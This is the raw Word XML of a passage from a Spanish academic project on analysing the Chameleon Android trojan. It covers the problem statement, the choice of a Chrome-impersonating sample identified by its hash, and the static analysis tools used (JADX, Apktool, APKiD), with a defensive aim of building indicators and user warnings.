          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.3   DEFINICIÓN DEL PROBLEMA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="0CF69476" w14:textId="77777777" w:rsidR="00425C7A" w:rsidRDefault="00425C7A" w:rsidP="00425C7A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED68C88" w14:textId="072C0F97" w:rsidR="00425C7A" w:rsidRDefault="00845765" w:rsidP="00425C7A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Pese a las medidas de seguridad existentes en Android, una parte importante del malware sigue teniendo éxito en su cometido, con la combinación de distintos tipos de ataques y mecanismos para tratar de obtener privilegios adicionales. En muchos casos el desconocimiento de los propios usuarios y la falta de comprobaciones adicionales provoca las infecciones y los consiguientes comportamientos maliciosos por parte de las aplicaciones. </w:t>
      </w:r>
      <w:r w:rsidR="007A125D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El abuso de los permisos es uno de los vectores que puede utilizar el malware en Android, particularmente aquellos de tipo troyano. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A13C11" w14:textId="78FBAB05" w:rsidR="007A125D" w:rsidRDefault="007A125D" w:rsidP="00425C7A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es importante recabar información para conocer su funcionamiento en detalle, desde la llegada de la aplicación al dispositivo previa a su instalación hasta  sus técnicas para conseguir tomar el control de los dispositivos y las acciones que realiza. De toda esta información que se ha de recabar se puede extraer un perfil que identifique al malware bajo análisis, y que permita crear una serie de IoCs que permitan su reconocimiento preventivo de manera automática,</w:t>
      </w:r>
      <w:r w:rsidR="001D6543">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la </w:t>
      </w:r>
      <w:r w:rsidR="00BE5394">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>obtención de información acerca</w:t>
      </w:r>
      <w:r w:rsidR="001D6543">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de los grupos de atacantes que </w:t>
      </w:r>
      <w:r w:rsidR="00287AAD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pueden estar</w:t>
      </w:r>
      <w:r w:rsidR="001D6543">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tras su creación y explotación en el caso de que esto sea posible,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> además de poder utilizar </w:t>
      </w:r>
      <w:r w:rsidR="00B87ABD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>los datos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre </w:t>
      </w:r>
      <w:r w:rsidR="00B87ABD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el proceso del malware para</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> petición de permisos y </w:t>
      </w:r>
      <w:r w:rsidR="00B87ABD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">los </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">pasos iniciales </w:t>
      </w:r>
      <w:r w:rsidR="00B87ABD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">que efectúa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para </w:t>
      </w:r>
      <w:r w:rsidR="00B87ABD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>así utilizarlos en la realización de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> campañas de advertencia con finalidad preventiva destinadas a los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E29679C" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25789807" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6CFB8B"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0" w:name="_1.4__"/>
      <w:bookmarkStart w:id="21" w:name="_Toc107862681"/>
      <w:bookmarkStart w:id="22" w:name="_Toc170500151"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.4   MALWARE ELEGIDO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="55FAC369" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10276AAA" w14:textId="0FDFDBAB" w:rsidR="00E95A92" w:rsidRDefault="00C92728" w:rsidP="004E2DEA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ha elegido una muestra de la familia de troyanos conocida como Chameleon. </w:t>
      </w:r>
      <w:r w:rsidR="00916D0B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pese a tener el mismo nombre que una botnet surgida en 2013</w:t>
      </w:r>
      <w:r w:rsidR="00C618F8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r w:rsidR="00916D0B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, la familia en la que se centrará el proyecto tiene únicamente como objetivo la infección de dispositivos Android. Chameleon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">apareció online </w:t>
      </w:r>
      <w:r w:rsidR="00916D0B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">por primera vez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a principios de 2023</w:t>
      </w:r>
      <w:r w:rsidR="007E3358">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y desde entonces ha pasado por diferentes iteraciones, introduciendo nuevos mecanismos para obtener sus objetivos</w:t>
      </w:r>
      <w:r w:rsidR="00961B21">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y evadir la detección por los usuarios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Las razones detrás de esta elección son </w:t>
      </w:r>
      <w:r w:rsidR="00AC0165">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>principalmente dos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. En primer lugar, se trata de un malware reciente y que se encuentra actualmente en el foco </w:t>
      </w:r>
      <w:r w:rsidR="00AC0165">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de la prensa generalista </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">debido a la gran cantidad </w:t>
      </w:r>
      <w:r w:rsidR="00AC0165">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de amenazas que presenta pese a ser un único malware [X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Asimismo, esta nueva versión es diferente a las anteriores, y también a otros troyanos para sistemas Android, en la manera en que gestiona los parámetros de accesibilidad para hacerse con el control del dispositivo y evitar la protección biométrica para su desbloqueo</w:t>
      </w:r>
      <w:r w:rsidR="000E6EA2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C04790">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Además</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, pese a ser un malware relativamente popular en estos últimos años</w:t>
      </w:r>
      <w:r w:rsidR="002179A1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y aunque como se ha mencionado, sí que existen multitud de artículos </w:t>
      </w:r>
      <w:r w:rsidR="00A763BF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de carácter general </w:t>
      </w:r>
      <w:r w:rsidR="002179A1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">en medios de comunicación </w:t>
      </w:r>
      <w:r w:rsidR="00C62DD8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">reconocidos </w:t>
      </w:r>
      <w:r w:rsidR="002179A1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>haciendo referencia a la amenaza que presenta para los usuarios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, no se </w:t>
      </w:r>
      <w:r w:rsidR="002179A1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>han publicado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> artículos especializados ni análisis </w:t>
      </w:r>
      <w:r w:rsidR="002179A1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>detallados del malware</w:t>
      </w:r>
      <w:r w:rsidR="009F2270">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, siendo el único análisis encontrado el desarrollado por la empresa </w:t>
      </w:r>
      <w:r w:rsidR="000E6128">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">estadounidense </w:t>
      </w:r>
      <w:r w:rsidR="009F2270">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de ciberseguridad Cyble en abril de 2023 para una de las </w:t>
      </w:r>
      <w:r w:rsidR="006D282D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">nuevas </w:t>
      </w:r>
      <w:r w:rsidR="009F2270">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">versiones </w:t>
      </w:r>
      <w:r w:rsidR="006D282D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>del troyano</w:t>
      </w:r>
      <w:r w:rsidR="009F2270">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Por todas estas razones expuestas</w:t>
      </w:r>
      <w:r w:rsidR="00136D24">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se ha decidido finalmente seleccionar esta familia de malware como temática del proyecto</w:t>
      </w:r>
      <w:r w:rsidR="00C65B15">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y más concretamente la versión de Chameleon que se hace pasar por </w:t>
      </w:r>
      <w:r w:rsidR="008870EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la aplicación </w:t>
      </w:r>
      <w:r w:rsidR="00C65B15">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Google Chrome</w:t>
      </w:r>
      <w:r w:rsidR="008242F8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y</w:t>
      </w:r>
      <w:r w:rsidR="00C65B15">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que </w:t>
      </w:r>
      <w:r w:rsidR="008242F8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>posee</w:t>
      </w:r>
      <w:r w:rsidR="008870EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el</w:t>
      </w:r>
      <w:r w:rsidR="00C65B15">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> valor hash SHA-256 de </w:t>
      </w:r>
      <w:r w:rsidR="00C65B15" w:rsidRPr="00C65B15">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>0a6ffd4163cd96d7d262be5ae7fa5cfc3affbea822d122c0803379d78431e5f6</w:t>
      </w:r>
      <w:r w:rsidR="00C65B15">
        <w:rPr>
          <w:rStyle w:val="hscoswrapper"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00711F4B">
        <w:rPr>
          <w:rStyle w:val="hscoswrapper"/>
        </w:rPr>
        <w:t xml:space="preserve"> La muestra ha sido obtenida del popular repositorio de malware y publicaciones de ciberseguridad V</w:t>
      </w:r>
      <w:r w:rsidR="0043767C">
        <w:rPr>
          <w:rStyle w:val="hscoswrapper"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00711F4B">
        <w:rPr>
          <w:rStyle w:val="hscoswrapper"/>
        </w:rPr>
        <w:t xml:space="preserve"> Underground [X].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5333B53A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BC5820" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="0043767C" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318D863D" w14:textId="313E4493"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23" w:name="_1.4.2__"/>
      <w:bookmarkStart w:id="24" w:name="_Toc107862683"/>
      <w:bookmarkStart w:id="25" w:name="_Toc170500152"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4.2   Tecnologías </w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidR="009A461D">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>utilizadas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="1D639800" w14:textId="6E0F9639" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61BEBBBC" w14:textId="0BB30D21" w:rsidR="008B284C" w:rsidRDefault="00E25AE6" w:rsidP="00BD7B56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A continuación, se incluyen las tecnologías utilizadas a lo largo de la realización del proyecto, formando parte</w:t>
      </w:r>
      <w:r w:rsidR="00250473">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="00250473">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ambas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> fa</w:t>
      </w:r>
      <w:r w:rsidR="00250473">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00D9791E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de análisis del malware.</w:t>
      </w:r>
      <w:r w:rsidR="00250473">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> En primer </w:t>
      </w:r>
      <w:r w:rsidR="00BE7406">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lugar,</w:t>
      </w:r>
      <w:r w:rsidR="00250473">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se comentan las herramientas utilizadas par</w:t>
      </w:r>
      <w:r w:rsidR="00D9791E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00250473">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> realizar el análisis estático del código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E712D7E" w14:textId="7E86B508" w:rsidR="008B284C" w:rsidRDefault="008B284C" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FE2875" w14:textId="10DBF72F" w:rsidR="006452C9" w:rsidRDefault="000C1FC5" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="54E456E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2087" type="#_x0000_t75" alt="A colorful logo with black letters&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:0;margin-top:38.6pt;width:89.5pt;height:87.35pt;z-index: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5" o:title="A colorful logo with black letters&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13058097" w14:textId="7603238D" w:rsidR="007307AD" w:rsidRDefault="008B284C" w:rsidP="00BD7B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>JADX</w:t>
      </w:r>
      <w:r w:rsidR="004310E0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: se trata de una de las herramientas más populares para descompilar código DEX proveniente de un archivo APK Android a código Java, que es significantemente más fácil de comprender. Además, cuenta con una versión con interfaz gráfica de usuario que permite la visualización de proyectos completos, así como el renombrado de clases, métodos y código junto con el añadido de comentarios, siendo de especial utilidad en la reestructuración y anotación de código ofuscado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24BF73" w14:textId="4EA3D97B" w:rsidR="001F5502" w:rsidRDefault="001F5502" w:rsidP="001F5502">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D945C80" w14:textId="7EDB26A9" w:rsidR="001F5502" w:rsidRDefault="000C1FC5" w:rsidP="001F5502">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="0C41D239">
          <v:shape id="Picture 15" o:spid="_x0000_s2086" type="#_x0000_t75" alt="A green and blue text on a black background&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:0;margin-top:35.05pt;width:98.3pt;height:53.3pt;z-index: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26" o:title="A green and blue text on a black background&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A581A9" w14:textId="347DF807" w:rsidR="00BE2E1E" w:rsidRPr="007307AD" w:rsidRDefault="00BE2E1E" w:rsidP="00BE2E1E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3598908F" w14:textId="167EE69B" w:rsidR="00250473" w:rsidRDefault="00851A6F" w:rsidP="002B5584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Apktool</w:t>
      </w:r>
      <w:r w:rsidR="001F5502">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00183598">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>herramienta versátil que sirve para desempaquetar archivos APK y obtener fácilmente a través de la línea de comandos todos los ficheros que componen la aplicación, además de permitir realizar tareas adicionales como el reempaquetado una vez se han aplicado modificaciones en el código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B871B" w14:textId="3899389D" w:rsidR="008270C8" w:rsidRDefault="000C1FC5" w:rsidP="008270C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="60C1CBE8">
          <v:shape id="Picture 16" o:spid="_x0000_s2085" type="#_x0000_t75" alt="A red letter on a white background&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:150.05pt;margin-top:34.1pt;width:150.55pt;height:34.1pt;z-index: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7" o:title="A red letter on a white background&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2A613" w14:textId="33A0BDAC" w:rsidR="00183598" w:rsidRDefault="00183598" w:rsidP="00183598">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AED5052" w14:textId="14C1C8E6" w:rsidR="0044537B" w:rsidRDefault="006C678D" w:rsidP="00914111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APKiD</w:t>
      </w:r>
      <w:r w:rsidR="00183598">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: utilidad para la identificación de packers, protectores y ofuscadores en el proceso de creación de una aplicación. Si algún método popular se ha utilizado para la realización de estas acciones de evasión, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">APKiD </w:t>
      </w:r>
